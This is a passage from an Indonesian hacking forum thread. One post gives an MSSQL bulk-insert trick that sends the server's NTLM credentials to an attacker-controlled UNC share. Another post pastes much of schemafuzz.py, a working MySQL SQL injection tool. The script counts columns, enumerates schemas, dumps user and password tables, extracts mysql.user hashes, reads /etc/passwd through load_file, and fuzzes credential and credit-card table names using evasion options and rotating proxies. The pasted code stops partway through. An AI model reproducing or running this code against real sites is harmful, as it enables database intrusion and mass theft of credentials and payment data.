    This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain & Abel.
    Bulk insert from a UNC Share (S)
    bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
    Last edited by nveuu; 13-05-09 at 22:12.

  12. #26

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    eaa.. dia copas blind sqli dah, wah ane bkn penerjemah ni.. mungkin kasih clue ja klo mo expert di vulner ini (ane ga expert soalny,web programmingnya jeblog, klo socket2an hayu deh )
    - belajar dlu query2 sql ampe detil, bnyk buku2nya..trus baru deh dikembangan di injeksi2.. gud luck^^

  13. #27
    nveuu's Avatar
    Join Date
    Apr 2007
    Location
    di warnet
    Posts
    2,496
    Points
    494.79
    Thanks: 36 / 20 / 11

    Default

    Quote Originally Posted by bl00d13z View Post
    eaa.. dia copas blind sqli dah, wah ane bkn penerjemah ni.. mungkin kasih clue ja klo mo expert di vulner ini (ane ga expert soalny,web programmingnya jeblog, klo socket2an hayu deh )
    - belajar dlu query2 sql ampe detil, bnyk buku2nya..trus baru deh dikembangan di injeksi2.. gud luck^^
    hahahahahag...
    req ebook nya dong suhu... yg bahasa indonesia tp

    ane jg jeblog web prgraming nye ...

  14. #28
    chikebum's Avatar
    Join Date
    Nov 2006
    Posts
    3,396
    Points
    4,709.22
    Thanks: 13 / 294 / 69

    Default

    *damn script kiddies trying to be l33t =D

    echo "script kiddies" > /dev/null

  15. #29
    PeCuNnN's Avatar
    Join Date
    Oct 2006
    Location
    .:[- IndoGamers -]:.
    Posts
    3,608
    Points
    4,396.90
    Thanks: 0 / 42 / 28

    Default

    Quote Originally Posted by chikebum View Post
    *damn script kiddies trying to be l33t =D

    echo "script kiddies" > /dev/null
    mana tu bum script yg lu kasi ke gua lngsung bisa dpt root account =D
    ARIKANAMI

    RMD_RetroooRTR

  16. #30

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by nveuu View Post
    hahahahahag...
    req ebook nya dong suhu... yg bahasa indonesia tp

    ane jg jeblog web prgraming nye ...
    waduuh.. ane ga pny yg indo bro, tar req aj di thread e-book..sp tau da yg pny btw ane lanjutin sqli pake script tools ya..fitur-fiturny antara lain:
    - auto find column
    - data extractor (shema buat sql 5++ & fuzz technique buat sql 4++)
    - fasilitas log process

    Spoiler untuk schemafuzz.py :

    Code:
    #!/usr/bin/python
    ################################################################ 
    #       .___             __          _______       .___        # 
    #     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
    #    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
    #   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
    #   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
    #        \/                  \/             \/                 # 
    #                   ___________   ______  _  __                # 
    #                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
    #                 \  \___|  | \/\  ___/\     /                 # 
    #                  \___  >__|    \___  >\/\_/                  # 
    #      est.2007        \/            \/   forum.darkc0de.com   # 
    ################################################################ 
    # MySQL Injection Schema, Dataext, and fuzzer
    
    # Share the c0de!
    
    # Darkc0de Team 
    # www.darkc0de.com 
    # rsauron[at]gmail[dot]com
    
    # Greetz to 
    # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, 
    # and the darkc0de crew
    
    # NOTES: 
    # Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
    # The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy 
    # will not be used. This is a effort to keep the script from getting stuck in a endless loop.
    # Any other questions Hit the forums and ask questions. google is your friend!
    
    # This was written for educational purpose only. Use it at your own risk.
    # Author will be not responsible for any damage!
    # Intended for authorized Web Application Pen Testing!
    
    # BE WARNED, THIS TOOL IS VERY LOUD..
    
    #Set default evasion options here
    arg_end = "--"
    arg_eva = "+"
    
    #colMax variable for column Finder
    colMax = 205
    #Fill in the tables you want tested here.
    fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 'sysconstraints', 'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
    #Fill in the columns you want tested here.
    fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', '*****', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']
    
    import urllib, sys, re, os, socket, httplib, urllib2, time, random
    
    #determine platform
    if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
    	SysCls = 'clear'
    elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
    	SysCls = 'cls'
    else:
    	SysCls = 'unknown'
    
    #say hello
    os.system(SysCls)
    if len(sys.argv) <= 1:
            print "\n|---------------------------------------------------------------|"
            print "| rsauron[@]gmail[dot]com                                v5.0   |"
            print "|   6/2008      schemafuzz.py                                   |"
            print "|      -MySQL v5+ Information_schema Database Enumeration       |"
            print "|      -MySQL v4+ Data Extractor                                |"
            print "|      -MySQL v4+ Table & Column Fuzzer                         |"
            print "| Usage: schemafuzz.py [options]                                |"
            print "|                      -h help                    darkc0de.com  |"
            print "|---------------------------------------------------------------|\n"
            sys.exit(1)
    			
    
    #help option
    for arg in sys.argv:
            if arg == "-h":
                    print "   Usage: ./schemafuzz.py [options]                          rsauron[@]gmail[dot]com darkc0de.com"
                    print "\tModes:"
                    print "\tDefine: --dbs     Shows all databases user has access too.               MySQL v5+"
                    print "\tDefine: --schema  Enumerate Information_schema Database.                 MySQL v5+"
                    print "\tDefine: --full    Enumerates all databases information_schema table      MySQL v5+"
                    print "\tDefine: --dump    Extract information from a Database, Table and Column. MySQL v4+"
                    print "\tDefine: --fuzz    Fuzz Tables and Columns.                               MySQL v4+"
                    print "\tDefine: --findcol Finds Columns length of a SQLi                         MySQL v4+"
                    print "\tDefine: --info    Gets MySQL server configuration only.                  MySQL v4+"
                    print "\n\tRequired:"
                    print "\tDefine: -u        URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
                    print "\n\tMode dump and schema options:"
                    print "\tDefine: -D        \"database_name\""
                    print "\tDefine: -T        \"table_name\""
                    print "\tDefine: -C        \"column_name,column_name...\""
                    print "\n\tOptional:"
                    print "\tDefine: -p        \"127.0.0.1:80 or proxy.txt\""
                    print "\tDefine: -o        \"ouput_file_name.txt\"        Default is schemafuzzlog.txt"
                    print "\tDefine: -r        row number to start at"
                    print "\tDefine: -v        Verbosity off option. Will not display row #'s in dump mode."   
                    print "\n   Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
                    print "   Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
                    print "   Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200"
                    print "   Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password"
                    print "   Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt"
                    print "   Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\""
                    sys.exit(1) 
    
    #define varablies
    site = ""
    dbt = "schemafuzzlog.txt"
    proxy = "None"
    count = 0
    arg_table = "None"
    arg_database = "None"
    arg_columns = "None"
    arg_row = "Rows"
    arg_verbose = 1
    darkc0de = "concat(0x1e,0x1e,"
    mode = "None"
    line_URL = ""
    count_URL = ""
    gets = 0
    cur_db = ""
    cur_table = ""
    table_num = 0
    terminal = ""
    num = 0
    
    
    #Check args
    for arg in sys.argv:
    	if arg == "-u":
    		site = sys.argv[count+1]
    	elif arg == "-o":
    		dbt = sys.argv[count+1]
    	elif arg == "-p":
    		proxy = sys.argv[count+1]
    	elif arg == "--dump":
                    mode = arg
                    arg_dump = sys.argv[count]
            elif arg == "--full":
                    mode = arg
            elif arg == "--schema":
                    mode = arg
                    arg_schema = sys.argv[count]
            elif arg == "--dbs":
                    mode = arg
                    arg_dbs = sys.argv[count]
            elif arg == "--fuzz":
                    mode = arg
                    arg_fuzz = sys.argv[count]
            elif arg == "--info":
                    mode = arg
                    arg_info = sys.argv[count]
            elif arg == "--findcol":
                    mode = arg
                    arg_findcol = sys.argv[count]
    	elif arg == "-D":
    		arg_database = sys.argv[count+1]
    	elif arg == "-T":
    		arg_table = sys.argv[count+1]
    	elif arg == "-C":
    		arg_columns = sys.argv[count+1]
    	elif arg == "-end":
                    arg_end = sys.argv[count+1]
                    if arg_end == "--":
                            arg_eva = "+"
                    else:
                            arg_eva = "/**/"
    	elif arg == "-r":
                    num = sys.argv[count+1]
                    table_num = num
            elif arg == "-v":
                    arg_verbose = sys.argv[count]
                    arg_verbose = 0
    	count+=1
    
    #Title write
    file = open(dbt, "a")
    print "\n|---------------------------------------------------------------|"
    print "| rsauron[@]gmail[dot]com                                v5.0   |"
    print "|   6/2008      schemafuzz.py                                   |"
    print "|      -MySQL v5+ Information_schema Database Enumeration       |"
    print "|      -MySQL v4+ Data Extractor                                |"
    print "|      -MySQL v4+ Table & Column Fuzzer                         |"
    print "| Usage: schemafuzz.py [options]                                |"
    print "|                      -h help                    darkc0de.com  |"
    print "|---------------------------------------------------------------|"
    file.write("\n|---------------------------------------------------------------|")
    file.write("\n| rsauron[@]gmail[dot]com                                v5.0   |")
    file.write("\n|   6/2008      schemafuzz.py                                   |")
    file.write("\n|      -MySQL v5+ Information_schema Database Enumeration       |")
    file.write("\n|      -MySQL v4+ Data Extractor                                |")
    file.write("\n|      -MySQL v4+ Table & Column Fuzzer                         |")
    file.write("\n| Usage: schemafuzz.py [options]                                |")
    file.write("\n|                      -h help                    darkc0de.com  |")
    file.write("\n|---------------------------------------------------------------|")
    
    #Arg Error Checking
    if site == "":
            print "\n[-] Must include -u flag and specify a mode."
            print "[-] For help -h\n"
            sys.exit(1)
    if mode == "None":
            print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info, --full, --findcol."
            print "[-] For help -h\n"
            sys.exit(1)
    if mode == "--schema" and arg_database == "None":
            print "[-] Must include -D flag!"
            print "[-] For Help -h\n"
            sys.exit(1)
    if mode == "--dump":
            if arg_table == "None" or arg_columns == "None":
                    print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
                    print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
                    print "[-] For help -h\n"
                    sys.exit(1)
    if mode != "--findcol" and site.find("darkc0de") == -1: 
    	print "\n[-] Site must contain \'darkc0de\'\n" 
    	sys.exit(1)
    if proxy != "None":
            if len(proxy.split(".")) == 2:
                    proxy = open(proxy, "r").read()
            if proxy.endswith("\n"):
                    proxy = proxy.rstrip("\n")
            proxy = proxy.split("\n")
    if arg_columns != "None":
            arg_columns = arg_columns.split(",")
    if site[:7] != "http://": 
    	site = "http://"+site
    if site.endswith("/*"):
    	site = site.rstrip('/*')
    if site.endswith("--"):
    	site = site.rstrip('--')
    	
    #Getting the URL ready with the evasion options we selected
    site = site.replace("+",arg_eva)
    site = site.replace("/**/",arg_eva)
    print "\n[+] URL:",site+arg_end
    file.write("\n\n[+] URL:"+site+arg_end+"\n")
    print "[+] Evasion Used:","\""+arg_eva+"\" \""+arg_end+"\""
    file.write("[+] Evasion Used: \""+str(arg_eva)+"\" \""+str(arg_end)+"\"")
    print "[+] %s" % time.strftime("%X")
    file.write("\n[+] %s" % time.strftime("%X"))
    
    #Build proxy list
    socket.setdefaulttimeout(20)
    proxy_list = []
    if proxy != "None":
    	file.write("\n[+] Building Proxy List...")
    	print "[+] Building Proxy List..."
    	for p in proxy:
    		try:
    			proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
    			opener = urllib2.build_opener(proxy_handler)
    			gets+=1
    			opener.open("http://www.google.com")
    			proxy_list.append(urllib2.build_opener(proxy_handler))
    			file.write("\n\tProxy:"+p+"- Success")
    			print "\tProxy:",p,"- Success"
    		except:
    			file.write("\n\tProxy:"+p+"- Failed")
    			print "\tProxy:",p,"- Failed"
    			pass
    	if len(proxy_list) == 0:
    		print "[-] All proxies have failed. App Exiting"
    		sys.exit(1) 
    	print "[+] Proxy List Complete"
    	file.write("\n[+] Proxy List Complete")
    else:
    	print "[-] Proxy Not Given"
    	file.write("\n[+] Proxy Not Given")
    	proxy_list.append(urllib2.build_opener())
    proxy_num = 0
    proxy_len = len(proxy_list)
    
    #colFinder
    if mode == "--findcol":
            print "[+] Attempting To find the number of columns..."
            file.write("\n[+] Attempting To find the number of columns...")
            print "[+] Testing: ",
            file.write("\n[+] Testing: ",)
            checkfor=[]
            sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva
            makepretty = ""
            for x in xrange(0,colMax):
                    try:
                            sys.stdout.write("%s," % (x))
                            file.write(str(x)+",")
                            sys.stdout.flush()
                            darkc0de = "dark"+str(x)+"c0de"
                            checkfor.append(darkc0de)  
                            if x > 0: 
                                    sitenew += ","
                            sitenew += "0x"+darkc0de.encode("hex")	
                            finalurl = sitenew+arg_end
                            gets+=1
                            proxy_num+=1
                            source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
                            for y in checkfor:
                                    colFound = re.findall(y,source)
                                    if len(colFound) >= 1:
                                            print "\n[+] Column Length is:",len(checkfor)
                                            file.write("\n[+] Column Length is: "+str(len(checkfor)))
                                            nullcol = re.findall(("\d+"),y)
                                            print "[+] Found null column at column #:",nullcol[0]
                                            file.write("\n[+] Found null column at column #: "+nullcol[0])
                                            for z in xrange(0,len(checkfor)):
                                                    if z > 0:
                                                            makepretty += ","
                                                    makepretty += str(z)
                                            site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty
                                            print "[+] SQLi URL:",site+arg_end
                                            file.write("\n[+] SQLi URL: "+site+arg_end)
                                            site = site.replace(","+nullcol[0]+",",",darkc0de,")
                                            site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
                                            site = site.replace(","+nullcol[0],",darkc0de")
                                            print "[+] darkc0de URL:",site
                                            file.write("\n[+] darkc0de URL: "+site)
                                            print "[-] Done!\n"
                                            file.write("\n[-] Done!\n")
                                            sys.exit(1)
                    except (KeyboardInterrupt, SystemExit):
                            raise
                    except:
                            pass
                            
            print "\n[!] Sorry Column Length could not be found."
            file.write("\n[!] Sorry Column Length could not be found.")
            print "[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!"
            print "[-] Done\n"
            sys.exit(1)
    
    #Retireve version:user:database
    head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
    print "[+] Gathering MySQL Server Configuration..."
    file.write("\n[+] Gathering MySQL Server Configuration...\n")
    
    while 1:
    	try:
                    gets+=1
    		source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
    # Uncomment the following lines to debug issues with gathering server information
    #		print head_URL
    #		print source
    		match = re.findall("\x1e\x1e\S+",source)
    		if len(match) >= 1:
    			match = match[0][2:].split("\x1e")
    			version = match[0]
    			user = match[1]
    			database = match[2]
    			print "\tDatabase:", database
    			print "\tUser:", user
    			print "\tVersion:", version
    			file.write("\tDatabase: "+database+"\n")	
    			file.write("\tUser: "+user+"\n")
    			file.write("\tVersion: "+version)
                            version = version[0]
                            break
    		else:
    			print "[-] No Data Found"
    			sys.exit(1)
    	except (KeyboardInterrupt, SystemExit):
            	raise
    	except:
    		proxy_num+=1
    
    # Do we have Access to MySQL database and Load_File
    if mode == "--info":
            head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
            gets+=1
            proxy_num+=1
            #print "Debug:",head_URL 
            source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
            match = re.findall("darkc0de",source)
            if len(match) >= 1:
                    yesno = "Yes <-- w00t w00t"
            else:
                    yesno = "No"
            print "\n[+] Do we have Access to MySQL Database:",yesno
            file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
            if yesno == "Yes <-- w00t w00t":
                    print "[!]",site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
                    file.write("\n[!] "+site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end)
            gets+=1
            proxy_num+=1
            head_URL = site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
            #print "Debug:",head_URL
            source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
            match = re.findall("root:x:",source)
            match = re.findall("root:*:",source)
            if len(match) >= 1:
                    yesno = "Yes <-- w00t w00t"
            else:
                    yesno = "No"
            print "\n[+] Do we have Access to Load_File:",yesno
            file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
            if yesno == "Yes <-- w00t w00t":
                    print "[!]",site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
                    file.write("\n[!] "+site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end)
    
    #lets check what we can do based on version
    if mode == "--schema" or mode == "--dbs" or mode == "--full":
            if int(version) == 4:
                    print "\n[-] --schema, --dbs and --full can only be used on MySQL v5+ servers!"
                    print "[-] -h for help"
                    sys.exit(1)
    #Build URLS
    if mode == "--schema":
    	if arg_database != "None" and arg_table == "None":
                    print "[+] Showing Tables & Columns from database \""+arg_database+"\""
                    file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
            	line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
                    line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
                    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
                    count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")+arg_end
                    arg_row = "Tables"
            if arg_database != "None" and arg_table != "None":
                    print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
                    file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
            	line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
                    line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
    		line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")
                    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
                    count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
    		count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")+arg_end
    		arg_row = "Columns"
    elif mode == "--dump":                
    	print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
    	print "[+] and Column(s) "+str(arg_columns)
    	file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
            file.write("\n[+] Column(s) "+str(arg_columns))
            for column in arg_columns:
                    darkc0de += column+",0x1e,"
    	count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
    	count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+arg_end
    	line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
    	line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table
            if int(version) == 4:
                    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
                    count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end
            	line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
                    line_URL += arg_eva+"FROM"+arg_eva+arg_table
    elif mode == "--full":
    	print "[+] Starting full SQLi information_schema enumeration..."
    	line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
    	line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns+"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"information_schema".encode("hex")
    		
    elif mode == "--dbs":
    	print "[+] Showing all databases current user has access too!"
    	file.write("\n[+] Showing all databases current user has access too!")
            count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
            count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")+arg_end
    	line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
    	line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")
    	arg_row = "Databases"
    line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end
    
    #Uncomment the lines below to debug issues with the line_URL or count_URL
